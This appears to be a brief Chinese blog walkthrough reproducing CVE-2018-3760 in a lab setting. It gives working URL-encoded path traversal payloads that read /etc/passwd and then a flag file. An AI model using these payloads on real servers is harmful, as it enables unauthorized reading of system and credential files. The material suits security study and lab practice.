当前位置: 首页 > news >正文

CVE-2018-3760

news 2026/4/1 23:05:24

CVE-2018-3760复现
image

打开网站
image

访问/assets/file:%2f%2f/etc/passwd
image

通过报错的提示,选择一个可以访问的路径
/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
image

访问flag
image

http://www.jsqmd.com/news/390445/

相关文章:

  • 缘分
  • MedRAGChecker:生物医学知识图谱增强大模型的声明级验证框架
  • [嵌入式系统-242]:AD转换电路常见问题与关键注意事项
  • 模型解释性实战:从黑盒到白盒的SHAP与LIME完全指南
  • [嵌入式系统-243]:为什么模拟地要与数字地分开,不分开的不良后果?
  • 信息论与编码篇---峰值信道比
  • 信息论与编码篇---结构相似性指数
  • 信息论与编码篇---均方误差
  • GenSpark vs Manus 架构深度分析
  • AI原生应用领域微服务集成的容器化部署实践
  • 2/17
  • 大数据领域存算分离:架构解析与应用实践
  • Manus AI 架构深度分析
  • RAG调试六步法:精准定位错误根源深度解析:原理、实战与踩坑记录
  • 寒假学习笔记2.8
  • 寒假学习笔记2.7
  • 树莓派pico播放玛丽有只小羊羔
  • AI原生应用:自然语言处理技术的10大核心应用场景解析
  • 树莓派pico蜂鸣器播放音乐
  • 树莓派 pico W(创客版)RP2020 W代码示例温度检测+液晶显示屏+HTTP服务器页面控制灯光
  • OpenClaw 产品定位
  • 钣金客户
  • 寒假学习笔记2.6
  • 寒假学习笔记2.5
  • 基于Spring Boot的酒店在线预订系统的开发与实现
  • day88(2.17)——leetcode面试经典150
  • 基于springboot企业员工信息管理系统_j57rz435
  • 基于SpringBoot的宠物寄领养网站的设计与实现_6fmr5z12
  • java毕业设计基于Spring Boot的危废料管理信息系统
  • 服务器运维(四十一)日服务器linux-audit.log分析工具—东方仙盟